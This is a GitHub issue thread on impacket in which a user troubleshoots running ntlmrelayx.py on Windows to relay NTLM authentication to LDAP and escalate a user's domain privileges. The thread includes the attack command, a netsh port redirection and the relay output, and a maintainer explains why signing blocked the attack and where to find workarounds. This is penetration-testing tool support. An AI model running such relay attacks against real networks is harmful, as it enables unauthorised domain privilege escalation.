### ISSUE TITLE
Change port

### ISSUE THREAD

**Issue by xiaoyiddos** [SecureAuthCorp/impacket#565]
I run it on Windows, and I added argument with '--smb-port 2019' and then use 'netsh interface portproxy add v4tov4 listenport=445 listenaddress=192.168.101.108 connectport=2019 connectaddress=192.168.101.108' to redirect port 445.But I got this error message.

`C:\Users\Administrator\Desktop\impacket-master\impacket-master\examples>ntlmrela
yx.py -t ldap://win-7se28dskt0r.test.com --escalate-user test001 --smb-port 2
019
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win
-7se28dskt0r.test.com
[*] HTTPD: Client requested path: /privexchange/
[*] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win
-7se28dskt0r.test.com
[*] HTTPD: Client requested path: /privexchange/
[!] The client requested signing. Relaying to LDAP will not work! (This usually
happens when relaying from SMB to LDAP)
[*] HTTPD: Client requested path: /privexchange/
[-] Authenticating against ldap://win-7se28dskt0r.test.com as \ FAILED
[*] HTTPD: Received connection from 192.168.101.102, attacking target ldap://win
-7se28dskt0r.test.com`

**Comment by xiaoyiddos** [comment]
I wanna run it on Windows, so I want to change the port of SMB (because port 445 is bound by Windows Kernal)

**Comment by asolino** [comment]
Hey @xiaoyiddos 

There are two different issues there:
1. using `netsh` is not enough to redirect the `SMB` port. Check [this](https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/) blogpost explaining other alternatives.
2. The `HTTPRelayServer` worked and you got some connections, but the target is enforcing signing, which will prevent the attack from happening. Your probably targeting Exchange 2013. For more details read [the attack](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/) described by @dirkjanm.
